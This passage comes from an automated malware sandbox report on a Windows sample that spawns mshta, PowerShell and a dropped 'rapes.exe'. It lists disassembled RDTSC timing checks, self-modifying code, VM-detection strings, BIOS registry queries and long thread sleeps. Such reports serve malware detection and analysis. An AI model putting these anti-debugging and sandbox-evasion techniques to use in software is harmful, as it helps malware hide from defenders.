                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B302AB second address: 4B30317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F4785B0BF50h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dx, E6E4h 0x00000015 pushfd 0x00000016 jmp 00007F4785B0BF4Dh 0x0000001b add ecx, 58E37726h 0x00000021 jmp 00007F4785B0BF51h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 pushad 0x0000002a call 00007F4785B0BF4Ch 0x0000002f movzx esi, bx 0x00000032 pop edi 0x00000033 call 00007F4785B0BF4Ch 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30317 second address: 4B30342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 test esi, esi 0x00000008 jmp 00007F4784F102D7h 0x0000000d je 00007F47F813E5A5h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30342 second address: 4B30346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30346 second address: 4B3034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3034A second address: 4B30350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30350 second address: 4B30373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4784F102CAh 0x00000019 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30373 second address: 4B30379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30379 second address: 4B3037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3037F second address: 4B30383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30383 second address: 4B303C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F47F813E566h 0x0000000e jmp 00007F4784F102D4h 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bl, 6Dh 0x0000001b jmp 00007F4784F102D6h 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B303C4 second address: 4B303DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edi, eax 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B303DB second address: 4B30422 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4784F102CEh 0x00000008 add ah, FFFFFFD8h 0x0000000b jmp 00007F4784F102CBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov dx, cx 0x00000016 popad 0x00000017 test edx, 61000000h 0x0000001d pushad 0x0000001e movzx ecx, bx 0x00000021 movsx edx, ax 0x00000024 popad 0x00000025 jne 00007F47F813E53Fh 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F4784F102CBh 0x00000032 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30422 second address: 4B30493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4785B0BF4Fh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4785B0BF59h 0x0000000f xor ecx, 6E248B86h 0x00000015 jmp 00007F4785B0BF51h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e test byte ptr [esi+48h], 00000001h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edi 0x00000025 pop eax 0x00000026 pop edx 0x00000027 mov edx, eax 0x00000029 popad 0x0000002a jne 00007F47F8D3A171h 0x00000030 jmp 00007F4785B0BF4Eh 0x00000035 test bl, 00000007h 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30493 second address: 4B30499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B30499 second address: 4B3049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B3049F second address: 4B304A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50A8E second address: 4B50AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 mov cx, di 0x00000009 pop edx 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4785B0BF59h 0x00000015 or ecx, 3000E8F6h 0x0000001b jmp 00007F4785B0BF51h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F4785B0BF50h 0x00000027 adc si, FA18h 0x0000002c jmp 00007F4785B0BF4Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50AF2 second address: 4B50B1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4784F102CCh 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50B1E second address: 4B50BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4785B0BF56h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007F4785B0BF4Eh 0x00000017 push ecx 0x00000018 pop ebx 0x00000019 pop eax 0x0000001a pushfd 0x0000001b jmp 00007F4785B0BF57h 0x00000020 xor eax, 10B1CEFEh 0x00000026 jmp 00007F4785B0BF59h 0x0000002b popfd 0x0000002c popad 0x0000002d and esp, FFFFFFF8h 0x00000030 jmp 00007F4785B0BF4Eh 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F4785B0BF57h 0x0000003d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50BBC second address: 4B50C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4784F102CFh 0x00000009 adc eax, 6095FE6Eh 0x0000000f jmp 00007F4784F102D9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F4784F102D0h 0x0000001b xor ax, D9E8h 0x00000020 jmp 00007F4784F102CBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4784F102D4h 0x00000031 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C2B second address: 4B50C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C31 second address: 4B50C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C35 second address: 4B50C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F4785B0BF55h 0x00000012 add cl, 00000066h 0x00000015 jmp 00007F4785B0BF51h 0x0000001a popfd 0x0000001b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C6C second address: 4B50C8D instructions: 0x00000000 rdtsc 0x00000002 mov cx, 6597h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov di, ax 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4784F102D0h 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C8D second address: 4B50C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C91 second address: 4B50C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50C97 second address: 4B50CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4785B0BF4Ch 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F4785B0BF4Bh 0x0000000f sub al, FFFFFFFEh 0x00000012 jmp 00007F4785B0BF59h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4785B0BF4Ch 0x00000023 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50CE2 second address: 4B50D25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F4784F102D4h 0x00000010 push ecx 0x00000011 pop esi 0x00000012 popad 0x00000013 mov esi, dword ptr [ebp+08h] 0x00000016 jmp 00007F4784F102D3h 0x0000001b sub ebx, ebx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50D25 second address: 4B50E14 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 93CDh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dx, si 0x0000000b popad 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f mov di, cx 0x00000012 pushfd 0x00000013 jmp 00007F4785B0BF4Eh 0x00000018 sub eax, 2C852018h 0x0000001e jmp 00007F4785B0BF4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007F47F8D1157Bh 0x0000002b jmp 00007F4785B0BF56h 0x00000030 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000037 jmp 00007F4785B0BF50h 0x0000003c mov ecx, esi 0x0000003e jmp 00007F4785B0BF50h 0x00000043 je 00007F47F8D1154Bh 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007F4785B0BF4Eh 0x00000050 sub si, F408h 0x00000055 jmp 00007F4785B0BF4Bh 0x0000005a popfd 0x0000005b popad 0x0000005c test byte ptr [77DE6968h], 00000002h 0x00000063 pushad 0x00000064 pushad 0x00000065 mov ax, di 0x00000068 mov ax, bx 0x0000006b popad 0x0000006c pushfd 0x0000006d jmp 00007F4785B0BF59h 0x00000072 and ah, FFFFFFD6h 0x00000075 jmp 00007F4785B0BF51h 0x0000007a popfd 0x0000007b popad 0x0000007c jne 00007F47F8D114F6h 0x00000082 push eax 0x00000083 push edx 0x00000084 pushad 0x00000085 mov dx, 7A5Eh 0x00000089 popad 0x0000008a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50E14 second address: 4B50E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50E1A second address: 4B50E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4B50E1E second address: 4B50E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007F4784F102D9h 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F4784F102CEh 0x00000016 push eax 0x00000017 jmp 00007F4784F102CBh 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4784F102D5h 0x00000024 rdtsc
                  Tries to evade debugger and weak emulator (self modifying code)
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESpecial instruction interceptor: First address: 39DCD1 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESpecial instruction interceptor: First address: 39CB43 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESpecial instruction interceptor: First address: 3C3B9A instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESpecial instruction interceptor: First address: 4245C0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 111DCD1 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 111CB43 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 1143B9A instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 11A45C0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXECode function: 10_2_04BB0AA0 rdtsc 10_2_04BB0AA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 180000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5762Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3658Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3999Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5881Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 526
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1985
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 2971
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 2256
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1281
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeAPI coverage: 3.9 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 996Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7548Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6496Thread sleep count: 57 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6496Thread sleep time: -114057s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6816Thread sleep count: 55 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6816Thread sleep time: -110055s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6796Thread sleep count: 526 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6796Thread sleep time: -15780000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6744Thread sleep time: -360000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6720Thread sleep count: 54 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6720Thread sleep time: -108054s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7124Thread sleep count: 1985 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7124Thread sleep time: -3971985s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6600Thread sleep count: 59 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6600Thread sleep time: -118059s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2752Thread sleep count: 2971 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2752Thread sleep time: -5944971s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2752Thread sleep count: 2256 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2752Thread sleep time: -4514256s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7124Thread sleep count: 1281 > 30
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7124Thread sleep time: -2563281s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B0DBBE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00ADC2A2 FindFirstFileExW,0_2_00ADC2A2
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B168EE FindFirstFileW,FindClose,0_2_00B168EE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B1698F
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D076
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D3A9
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B19B2B
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 180000
                  Source: rapes.exe, rapes.exe, 00000016.00000002.2113049150.00000000010FF000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: mshta.exe, 00000007.00000002.916613046.0000022B7785B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: svchost.exe, 0000000F.00000002.2114310656.000002DD9B827000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2114355611.000002DD9B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2116411383.000002DDA0E57000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000016.00000002.2111635363.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000016.00000002.2111635363.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: mshta.exe, 00000002.00000003.866961899.0000000002961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\)
                  Source: powershell.exe, 00000005.00000002.906202560.0000000002A6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5`
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.958911636.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\ 3
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000002.957796732.000000000037F000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000B.00000002.984479066.00000000010FF000.00000040.00000001.01000000.0000000F.sdmp, rapes.exe, 0000000C.00000002.990047516.00000000010FF000.00000040.00000001.01000000.0000000F.sdmp, TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000002.1002692939.000000000037F000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 00000016.00000002.2113049150.00000000010FF000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
                  Source: powershell.exe, 00000005.00000002.917585658.0000000006D7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
